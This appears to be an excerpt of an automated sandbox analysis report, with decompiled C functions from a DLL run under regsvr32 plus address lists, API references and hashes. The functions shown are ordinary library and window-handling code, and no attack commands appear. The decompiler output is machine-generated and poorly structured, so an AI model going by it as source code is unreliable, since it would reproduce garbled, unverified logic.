						_v24 = _t83;
						__eflags = _t83 -  *(_t96 + 8);
					} while (_t83 <  *(_t96 + 8));
					goto L32;
				}
			}

0x6da4e584
0x6da4e589
0x6da4e58b
0x6da4e590
0x00000000
0x6da4e592
0x6da4e599
0x6da4e59c
0x6da4e59f
0x6da4e5a2
0x6da4e5a5
0x6da4e5a7
0x6da4e5b7
0x6da4e5b7
0x6da4e5ba
0x6da4e5bc
0x6da4e5bf
0x6da4e5c2
0x6da4e5c5
0x6da4e6da
0x6da4e6dc
0x00000000
0x6da4e5cb
0x6da4e5cb
0x6da4e5cb
0x6da4e5ce
0x6da4e5d0
0x6da4e617
0x6da4e617
0x6da4e61c
0x6da4e61f
0x6da4e623
0x00000000
0x00000000
0x6da4e629
0x6da4e62d
0x6da4e63e
0x6da4e640
0x6da4e62f
0x6da4e62f
0x6da4e632
0x6da4e634
0x6da4e636
0x6da4e636
0x6da4e639
0x6da4e63b
0x6da4e63b
0x6da4e650
0x6da4e655
0x6da4e659
0x6da4e65b
0x6da4e660
0x6da4e663
0x6da4e665
0x6da4e667
0x6da4e667
0x6da4e677
0x6da4e677
0x6da4e67b
0x6da4e681
0x6da4e683
0x6da4e698
0x6da4e698
0x6da4e685
0x6da4e694
0x6da4e694
0x6da4e69c
0x6da4e6a2
0x6da4e6a4
0x6da4e6ab
0x6da4e6ae
0x6da4e6b2
0x6da4e6b5
0x6da4e6b6
0x6da4e6c2
0x6da4e6b8
0x6da4e6b8
0x6da4e6bb
0x6da4e6bb
0x6da4e6b6
0x6da4e6c7
0x00000000
0x6da4e6c7
0x6da4e5d2
0x6da4e5d5
0x6da4e5d7
0x00000000
0x00000000
0x6da4e5d9
0x6da4e5df
0x6da4e5e2
0x00000000
0x00000000
0x6da4e5e4
0x6da4e5e7
0x6da4e5e9
0x6da4e5eb
0x6da4e5eb
0x6da4e5ee
0x6da4e5f1
0x6da4e5f4
0x6da4e5f6
0x6da4e60e
0x6da4e5f8
0x6da4e606
0x6da4e606
0x6da4e6ca
0x6da4e6cd
0x6da4e6ce
0x6da4e6d1
0x6da4e6d1
0x00000000
0x6da4e5cb

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9732a22401bc88427d0a074a5b1fd92c5305c46e7638294ec464d4ccba4fa80b
Instruction ID: 8609fe5aa69b30b4424958bc643ad153acdfb9e45507bf1475486ec57d7ac45c
Opcode Fuzzy Hash: 9732a22401bc88427d0a074a5b1fd92c5305c46e7638294ec464d4ccba4fa80b
Instruction Fuzzy Hash: 76515D75A08216EFDB11CFA4C480E6ABBB4FF08354F15C169E915DB250E730EE80CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6DA517D8 Relevance: 6.1, APIs: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E6DA517D8(void* __eflags, void* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr* _v12;
				char _v16;
				char _v32;
				intOrPtr* _v36;
				intOrPtr* _v40;
				intOrPtr* _v44;
				intOrPtr* _v52;
				intOrPtr* _v56;
				intOrPtr* _v60;
				char _v64;
				char _v68;
				void* __edi;
				void* __ebp;
				intOrPtr* _t49;
				intOrPtr* _t52;
				intOrPtr* _t53;
				intOrPtr* _t58;
				intOrPtr _t59;
				intOrPtr* _t60;
				intOrPtr _t71;
				intOrPtr* _t73;
				char* _t83;
				intOrPtr* _t84;
				void* _t86;

				_t83 = _a4 + 0xffffff28;
				_t74 =  &_v16;
				E6DA4989A( &_v16, __eflags,  *((intOrPtr*)(_a4 - 0xbc)));
				if( *((intOrPtr*)(_t83 + 0x88)) == 0) {
					_t71 = _a8;
					__eflags =  *((intOrPtr*)(_t83 + 0x90));
					if( *((intOrPtr*)(_t83 + 0x90)) != 0) {
						L9:
						__eflags =  *((intOrPtr*)(_t83 + 0x9c)) - _t71;
						if( *((intOrPtr*)(_t83 + 0x9c)) != _t71) {
							L22:
							__eflags = _v12;
							if(_v12 != 0) {
								_push(_v16);
								_push(0);
								E6DA490A7();
							}
							_t49 = 0;
							__eflags = 0;
							L25:
							return _t49;
						}
						__imp__#9(_t83 + 0xac);
						_t52 =  *((intOrPtr*)(_t83 + 0x50));
						_a4 = 0;
						__eflags = _t52;
						if(_t52 != 0) {
							L12:
							_t74 =  *_t52;
							_t53 =  *((intOrPtr*)( *_t52))(_t52, 0x6da79178,  &_a4);
							__eflags = _t53;
							if(_t53 < 0) {
								goto L22;
							}
							E6DA5C5A0(_t83,  &_v64, 0, 0x20);
							E6DA5C5A0(_t83,  &_v32, 0, 0x10);
							_t58 = _a4;
							_t86 = _t86 + 0x18;
							__eflags = _t58;
							if(_t58 == 0) {
								goto L11;
							}
							_t59 =  *((intOrPtr*)( *_t58 + 0x18))(_t58, _t71, 0x6da791f8, 0, 2,  &_v32, _t83 + 0xac,  &_v64,  &_v8);
							_t73 = __imp__#6;
							_a8 = _t59;
							__eflags = _v60;
							if(_v60 != 0) {
								 *_t73(_v60);
							}
							__eflags = _v56;
							if(_v56 != 0) {
								 *_t73(_v56);
							}
							__eflags = _v52;
							if(_v52 != 0) {
								 *_t73(_v52);
							}
							_t60 = _a4;
							 *((intOrPtr*)( *_t60 + 8))(_t60);
							__eflags = _a8;
							if(_a8 >= 0) {
								 *((intOrPtr*)(_t83 + 0xa8)) = 1;
							}
							goto L22;
						}
						L11:
						_t52 = E6DA44898(_t74);
						goto L12;
					}
					_t74 = _t83;
					_v68 = 2;
					_v64 = _t71;
					_v60 = 0;
					_v56 = 0;
					_v52 = 0;
					_v44 = 0;
					_v40 = 0;
					_v36 = 0;
					E6DA4F53C(_t83,  &_v68);
					__eflags = _v44;
					if(_v44 == 0) {
						goto L9;
					}
					_t84 = _v44;
					__eflags = _v12;
					if(_v12 != 0) {
						_push(_v16);
						_push(0);
						E6DA490A7();
					}
					_t49 = _t84;
					goto L25;
				}
				if(_v12 != 0) {
					_push(_v16);
					_push(0);
					E6DA490A7();
				}
				return 0;
			}

0x6da517eb
0x6da517f1
0x6da517f4
0x6da51801
0x6da51819
0x6da5181c
0x6da51822
0x6da51868
0x6da51868
0x6da5186e
0x6da51929
0x6da51929
0x6da5192c
0x6da5192e
0x6da51931
0x6da51932
0x6da51932
0x6da51937
0x6da51937
0x6da51939
0x00000000
0x6da51939
0x6da5187b
0x6da51881
0x6da51884
0x6da51887
0x6da51889
0x6da51890
0x6da51890
0x6da5189c
0x6da5189e
0x6da518a0
0x00000000
0x00000000
0x6da518ad
0x6da518b9
0x6da518be
0x6da518c1
0x6da518c4
0x6da518c6
0x00000000
0x00000000
0x6da518e7
0x6da518ea
0x6da518f0
0x6da518f3
0x6da518f6
0x6da518fb
0x6da518fb
0x6da518fd
0x6da51900
0x6da51905
0x6da51905
0x6da51907
0x6da5190a
0x6da5190f
0x6da5190f
0x6da51911
0x6da51917
0x6da5191a
0x6da5191d
0x6da5191f
0x6da5191f
0x00000000
0x6da5191d
0x6da5188b
0x6da5188b
0x00000000
0x6da5188b
0x6da51828
0x6da5182a
0x6da51831
0x6da51834
0x6da51837
0x6da5183a
0x6da5183d
0x6da51840
0x6da51843
0x6da51846
0x6da5184b
0x6da5184e
0x00000000
0x00000000
0x6da51850
0x6da51853
0x6da51856
0x6da51858
0x6da5185b
0x6da5185c
0x6da5185c
0x6da51861
0x00000000
0x6da51861
0x6da51806
0x6da51808
0x6da5180b
0x6da5180c
0x6da5180c
0x00000000

APIs

VariantClear.OLEAUT32(?), ref: 6DA5187B
SysFreeString.OLEAUT32(?), ref: 6DA518FB
SysFreeString.OLEAUT32(?), ref: 6DA51905
SysFreeString.OLEAUT32(?), ref: 6DA5190F

Part of subcall function 6DA44898: __CxxThrowException@8.LIBCMT ref: 6DA448AE

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: FreeString$ClearException@8ThrowVariant
String ID:
API String ID: 1698861177-0
Opcode ID: e41367d8c857c793b59eb1eda75a9869eabae042b9bc0e2aea21d25918c4ebce
Instruction ID: e46d78f7a3f3267b41f9a9c97159c73963bca6826482ca533553191d29c4e5bb
Opcode Fuzzy Hash: e41367d8c857c793b59eb1eda75a9869eabae042b9bc0e2aea21d25918c4ebce
Instruction Fuzzy Hash: 07416679D1962AFFCB05CFA4C884AFDBB79BF49B00F14811AF115A2100C73099A1CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6DA43AEE Relevance: 6.1, APIs: 4, Instructions: 104
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E6DA43AEE(void* __ecx, struct HWND__** _a4) {
				struct HWND__** _v8;
				struct HWND__** _v12;
				long _t31;
				struct HWND__** _t32;
				struct HWND__** _t44;
				struct HWND__** _t45;
				long _t47;
				void* _t49;
				struct HWND__** _t63;

				_push(__ecx);
				_push(__ecx);
				_t49 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
					_t31 = _a4;
					if(_t31 != 0) {
						if( *((intOrPtr*)(_t31 + 8)) == 0) {
							L4:
							_t32 = E6DA4AFFB( *((intOrPtr*)(_t49 + 0x4c)) + 0x40, _t31, 0);
							_v12 = _t32;
							_a4 = _t32;
							E6DA3E977( &_a4);
							while(_a4 != 0) {
								_t37 =  *((intOrPtr*)(E6DA3E977( &_a4)));
								_v8 =  *((intOrPtr*)(E6DA3E977( &_a4)));
								if((E6DA4377C(_t37) & 0x00020000) != 0) {
									break;
								} else {
									_t45 = _v8;
									if(_t45[2] == 0 || SendMessageA( *_t45, 0xf0, 0, 0) != 1) {
										continue;
									} else {
										L16:
										_t44 = _v8;
										goto L17;
									}
								}
								goto L18;
							}
							_a4 = _v12;
							_t31 = E6DA43898( &_a4);
							while(_a4 != 0) {
								_t63 =  *(E6DA43898( &_a4));
								_v8 = _t63;
								if(_t63[2] == 0) {
									L13:
									_t31 = E6DA4377C(_t63);
									if((_t31 & 0x00020000) == 0) {
										continue;
									}
								} else {
									if(SendMessageA( *_t63, 0xf0, 0, 0) == 1) {
										goto L16;
									} else {
										_t63 = _v8;
										goto L13;
									}
								}
								goto L18;
							}
						} else {
							_t47 = SendMessageA( *_t31, 0xf0, 0, 0);
							_t44 = _a4;
							if(_t47 == 1) {
								L17:
								_t31 = SendMessageA( *_t44, 0xf1, 0, 0);
							} else {
								goto L4;
							}
						}
						L18:
					}
				}
				return _t31;
			}

0x6da43af3
0x6da43af4
0x6da43af7
0x6da43afe
0x6da43b04
0x6da43b09
0x6da43b19
0x6da43b32
0x6da43b3a
0x6da43b42
0x6da43b45
0x6da43b4f
0x6da43b90
0x6da43b65
0x6da43b69
0x6da43b76
0x00000000
0x6da43b78
0x6da43b78
0x6da43b7e
0x00000000
0x6da43beb
0x6da43beb
0x6da43beb
0x00000000
0x6da43beb
0x6da43b7e
0x00000000
0x6da43b76
0x6da43b9b
0x6da43ba5
0x6da43be4
0x6da43bbb
0x6da43bbd
0x6da43bc3
0x6da43bd8
0x6da43bd8
0x6da43be2
0x00000000
0x00000000
0x6da43bc5
0x6da43bd3
0x00000000
0x6da43bd5
0x6da43bd5
0x00000000
0x6da43bd5
0x6da43bd3
0x00000000
0x6da43bc3
0x6da43b1b
0x6da43b24
0x6da43b29
0x6da43b2c
0x6da43bee
0x6da43bf7
0x00000000
0x00000000
0x00000000
0x6da43b2c
0x6da43bf9
0x6da43bf9
0x6da43b09
0x6da43bfd

APIs

SendMessageA.USER32 ref: 6DA43B24
SendMessageA.USER32 ref: 6DA43B89
SendMessageA.USER32 ref: 6DA43BCE
SendMessageA.USER32 ref: 6DA43BF7

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: e0ec72108b15309d4f0a06cc0214a04a6096617df9bd038f8638c84d6774b979
Instruction ID: 96995c7b0b3d150cdd2af1896505b729d4dc7ed5f8e28554aa6541910d3914e2
Opcode Fuzzy Hash: e0ec72108b15309d4f0a06cc0214a04a6096617df9bd038f8638c84d6774b979
Instruction Fuzzy Hash: 03317A7458821ABBDB15CF55C885FAE7BA9EF41394F14C06AF646CB210CB31E9C2CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6DA69B9F Relevance: 6.1, APIs: 4, Instructions: 103
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6DA69B9F(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t73;

				_t73 = _a8;
				if(_t73 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t73 != 0) {
						E6DA5A2C6( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E6DA68B83( *_t73 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								_t40 = _v20 + 4; // 0x0
								__eflags = MultiByteToWideChar( *_t40, 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E6DA5CC92(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t15 = _t56 + 0xac; // 0x0
							_t65 =  *_t15;
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								_t24 = _t56 + 0xac; // 0x0
								__eflags = _a12 -  *_t24;
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t73[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t26 = _t56 + 0xac; // 0x0
								_t57 =  *_t26;
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t21 = _t56 + 4; // 0x0
							_t58 = MultiByteToWideChar( *_t21, 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t73 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

0x6da69ba9
0x6da69bb0
0x6da69bc7
0x00000000
0x6da69bb7
0x6da69bb9
0x6da69bd3
0x6da69bd8
0x6da69bdb
0x6da69bde
0x6da69c07
0x6da69c0e
0x6da69c10
0x6da69c91
0x6da69ca3
0x6da69cac
0x6da69cae
0x6da69bee
0x6da69bee
0x6da69bf1
0x6da69bf3
0x6da69bf6
0x6da69bf6
0x6da69bf6
0x6da69bf6
0x00000000
0x6da69bfc
0x6da69c70
0x6da69c70
0x6da69c75
0x6da69c7b
0x6da69c7e
0x6da69c80
0x6da69c83
0x6da69c83
0x6da69c83
0x6da69c83
0x00000000
0x6da69c87
0x6da69c12
0x6da69c15
0x6da69c15
0x6da69c1b
0x6da69c1e
0x6da69c45
0x6da69c48
0x6da69c48
0x6da69c4e
0x00000000
0x00000000
0x6da69c50
0x6da69c53
0x00000000
0x00000000
0x6da69c55
0x6da69c55
0x6da69c55
0x6da69c5b
0x6da69c5e
0x6da69bcc
0x6da69bcc
0x6da69c67
0x00000000
0x6da69c67
0x6da69c20
0x6da69c23
0x00000000
0x00000000
0x6da69c27
0x6da69c35
0x6da69c38
0x6da69c3e
0x6da69c40
0x6da69c43
0x00000000
0x00000000
0x00000000
0x6da69c43
0x6da69be0
0x6da69be3
0x6da69be5
0x6da69beb
0x6da69beb
0x00000000
0x6da69bbb
0x6da69bbb
0x6da69bc0
0x6da69bc4
0x6da69bc4
0x00000000
0x6da69bc0
0x6da69bb9

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6DA69BD3
__isleadbyte_l.LIBCMT ref: 6DA69C07
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,?,?,6DA7E9D0,00000000,00000000,00000020), ref: 6DA69C38
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,?,?,6DA7E9D0,00000000,00000000,00000020), ref: 6DA69CA6

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 33ec0f86f86e411e4388a91b051527ff55f81b1766cd3d9ef70428a87966f85b
Instruction ID: 9f038323767452d094e93796e2676258cac41eaee7d0dcb0fa7fb89f0ece38ed
Opcode Fuzzy Hash: 33ec0f86f86e411e4388a91b051527ff55f81b1766cd3d9ef70428a87966f85b
Instruction Fuzzy Hash: 5931D035A1C2C6EFEB01DF68CA809BE3BB5FF01311F1985A9E0658B190E331D990DB61

Uniqueness

Uniqueness Score: -1.00%

Function 6DA4AD55 Relevance: 6.1, APIs: 4, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E6DA4AD55(void* __ecx, void* __edx, void* __edi, void* __eflags, signed int _a4) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				signed int _t39;
				void* _t47;
				intOrPtr* _t48;
				void* _t50;
				void* _t51;
				void* _t64;
				void* _t65;
				intOrPtr _t66;
				void* _t68;
				void* _t70;

				_t65 = __edi;
				_t64 = __edx;
				_t51 = E6DA49881(_t50, __ecx, __edi, _t68, __eflags);
				_t29 =  *((intOrPtr*)(_t51 + 0x10));
				if(_t29 == 0) {
					L19:
					return 0 |  *((intOrPtr*)(_t51 + 0x10)) != 0x00000000;
				}
				_t32 = _t29 - 1;
				 *((intOrPtr*)(_t51 + 0x10)) = _t32;
				if(_t32 != 0) {
					goto L19;
				}
				if(_a4 == 0) {
					L8:
					_push(_t65);
					_t66 =  *((intOrPtr*)(E6DA4984E(_t51, _t65, 0, _t77) + 4));
					_t70 = E6DA4A0C0(0x6da858d0);
					if(_t70 == 0 || _t66 == 0) {
						L18:
						goto L19;
					} else {
						_t35 =  *((intOrPtr*)(_t70 + 0xc));
						_t80 = _t35;
						if(_t35 == 0) {
							L12:
							if( *((intOrPtr*)(_t66 + 0x98)) != 0) {
								_t36 =  *((intOrPtr*)(_t70 + 0xc));
								_a4 = _a4 & 0x00000000;
								_t83 = _t36;
								if(_t36 != 0) {
									_push(_t36);
									_t39 = E6DA5D83D(_t51, _t64, _t66, _t70, _t83);
									_push( *((intOrPtr*)(_t70 + 0xc)));
									_a4 = _t39;
									E6DA5AA38(_t51, _t66, _t70, _t83);
								}
								_t37 = E6DA5AB15(_t51, _t64, _t66,  *((intOrPtr*)(_t66 + 0x98)));
								 *((intOrPtr*)(_t70 + 0xc)) = _t37;
								if(_t37 == 0 && _a4 != _t37) {
									 *((intOrPtr*)(_t70 + 0xc)) = E6DA5AB15(_t51, _t64, _t66, _a4);
								}
							}
							goto L18;
						}
						_push(_t35);
						if(E6DA5D83D(_t51, _t64, _t66, _t70, _t80) >=  *((intOrPtr*)(_t66 + 0x98))) {
							goto L18;
						}
						goto L12;
					}
				}
				if(_a4 != 0xffffffff) {
					_t47 = E6DA46A43();
					if(_t47 != 0) {
						_t48 =  *((intOrPtr*)(_t47 + 0x3c));
						_t77 = _t48;
						if(_t48 != 0) {
							 *_t48(0, 0);
						}
					}
				}
				E6DA4AC82(_t51,  *((intOrPtr*)(_t51 + 0x20)), _t65);
				E6DA4AC82(_t51,  *((intOrPtr*)(_t51 + 0x1c)), _t65);
				E6DA4AC82(_t51,  *((intOrPtr*)(_t51 + 0x18)), _t65);
				E6DA4AC82(_t51,  *((intOrPtr*)(_t51 + 0x14)), _t65);
				E6DA4AC82(_t51,  *((intOrPtr*)(_t51 + 0x24)), _t65);
				goto L8;
			}

0x6da4ad55
0x6da4ad55
0x6da4ad61
0x6da4ad63
0x6da4ad6a
0x6da4ae42
0x6da4ae4d
0x6da4ae4d
0x6da4ad70
0x6da4ad71
0x6da4ad76
0x00000000
0x00000000
0x6da4ad7f
0x6da4adc3
0x6da4adc3
0x6da4adc9
0x6da4add6
0x6da4adda
0x6da4ae41
0x00000000
0x6da4ade0
0x6da4ade0
0x6da4ade3
0x6da4ade5
0x6da4adf6
0x6da4adfd
0x6da4adff
0x6da4ae02
0x6da4ae06
0x6da4ae08
0x6da4ae0a
0x6da4ae0b
0x6da4ae10
0x6da4ae13
0x6da4ae16
0x6da4ae1c
0x6da4ae23
0x6da4ae29
0x6da4ae2e
0x6da4ae3e
0x6da4ae3e
0x6da4ae2e
0x00000000
0x6da4adfd
0x6da4ade7
0x6da4adf4
0x00000000
0x00000000
0x00000000
0x6da4adf4
0x6da4adda
0x6da4ad85
0x6da4ad87
0x6da4ad8e
0x6da4ad90
0x6da4ad93
0x6da4ad95
0x6da4ad99
0x6da4ad99
0x6da4ad95
0x6da4ad8e
0x6da4ad9e
0x6da4ada6
0x6da4adae
0x6da4adb6
0x6da4adbe
0x00000000

APIs

__msize.LIBCMT ref: 6DA4ADE8
__msize.LIBCMT ref: 6DA4AE0B
_malloc.LIBCMT ref: 6DA4AE23
_malloc.LIBCMT ref: 6DA4AE38

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: __msize_malloc
String ID:
API String ID: 1288803200-0
Opcode ID: 00471d037eaefd7fa8c9c18e9d203645447f19bca9083442c57b2d9cef688cf7
Instruction ID: 217433bfa05cbfa0ba170416ba9f1440965fbb862f7398afc9086c64dc161973
Opcode Fuzzy Hash: 00471d037eaefd7fa8c9c18e9d203645447f19bca9083442c57b2d9cef688cf7
Instruction Fuzzy Hash: 92218F3160C6219FCB559F34CA85E6A77AABF4031CB26C539E9398B245DB30DDD1CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6DA5509D Relevance: 6.1, APIs: 4, Instructions: 78
windowCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E6DA5509D(void* __ebx, intOrPtr _a4, intOrPtr _a8, signed char _a12) {
				void* _t23;
				void* _t28;
				signed char _t29;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t36;

				_t28 = __ebx;
				_t35 = _a8;
				if(_t35 == 0) {
					_t34 = _a4;
					L14:
					_t36 = E6DA405F2(_t28, _t31, GetTopWindow( *(_t34 + 0x20)));
					if(_t36 != 0) {
						L7:
						if((GetWindowLongA( *(_t36 + 0x20), 0xffffffec) & 0x00010000) == 0) {
							L18:
							return _t36;
						}
						_push(_t28);
						_t29 = _a12;
						if((_t29 & 0x00000001) == 0 || IsWindowVisible( *(_t36 + 0x20)) != 0) {
							if((_t29 & 0x00000002) == 0 || E6DA436A2(_t36) != 0) {
								_push(_t29);
								_push(0);
								_push(_t36);
								goto L17;
							} else {
								goto L12;
							}
						} else {
							L12:
							_push(_t29);
							_push(_t36);
							_push(_t34);
							L17:
							_t36 = E6DA5509D(_t29);
							goto L18;
						}
					}
					return _t34;
				}
				_t31 = _t35;
				_t23 = E6DA438EE(_t35, 2);
				_t34 = _a4;
				while(_t23 == 0) {
					_t35 = E6DA55044(_t34, E6DA405F2(_t28, _t31, GetParent( *(_t35 + 0x20))));
					if(_t35 == 0 || _t35 == _t34) {
						goto L14;
					} else {
						_t31 = _t35;
						_t23 = E6DA438EE(_t35, 2);
						continue;
					}
				}
				_t36 = E6DA438EE(_t35, 2);
				goto L7;
			}

0x6da5509d
0x6da550a3
0x6da550a9
0x6da55132
0x6da55135
0x6da55144
0x6da55148
0x6da550f5
0x6da55105
0x6da5515a
0x00000000
0x6da5515a
0x6da55107
0x6da55108
0x6da5510e
0x6da55120
0x6da5514e
0x6da5514f
0x6da55151
0x00000000
0x00000000
0x00000000
0x00000000
0x6da5512d
0x6da5512d
0x6da5512d
0x6da5512e
0x6da5512f
0x6da55152
0x6da55157
0x00000000
0x6da55159
0x6da5510e
0x00000000
0x6da5514a
0x6da550b1
0x6da550b3
0x6da550b8
0x6da550e6
0x6da550d3
0x6da550d7
0x00000000
0x6da550dd
0x6da550df
0x6da550e1
0x00000000
0x6da550e1
0x6da550d7
0x6da550f3
0x00000000

APIs

GetTopWindow.USER32(?), ref: 6DA55138

Part of subcall function 6DA438EE: GetWindow.USER32(?,?), ref: 6DA438FA

GetParent.USER32(?), ref: 6DA550C0
GetWindowLongA.USER32(?,000000EC), ref: 6DA550FA
IsWindowVisible.USER32(?), ref: 6DA55113

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: Window$LongParentVisible
String ID:
API String ID: 506644340-0
Opcode ID: 38b62e8189ad9d2bdeb1e01189961e4570d3e1c7d5d0796e55d868393aa1dcef
Instruction ID: 723a3fc306be750b2acab3fb95c706b0f6da5624f0e4bc12a558cb4968655d55
Opcode Fuzzy Hash: 38b62e8189ad9d2bdeb1e01189961e4570d3e1c7d5d0796e55d868393aa1dcef
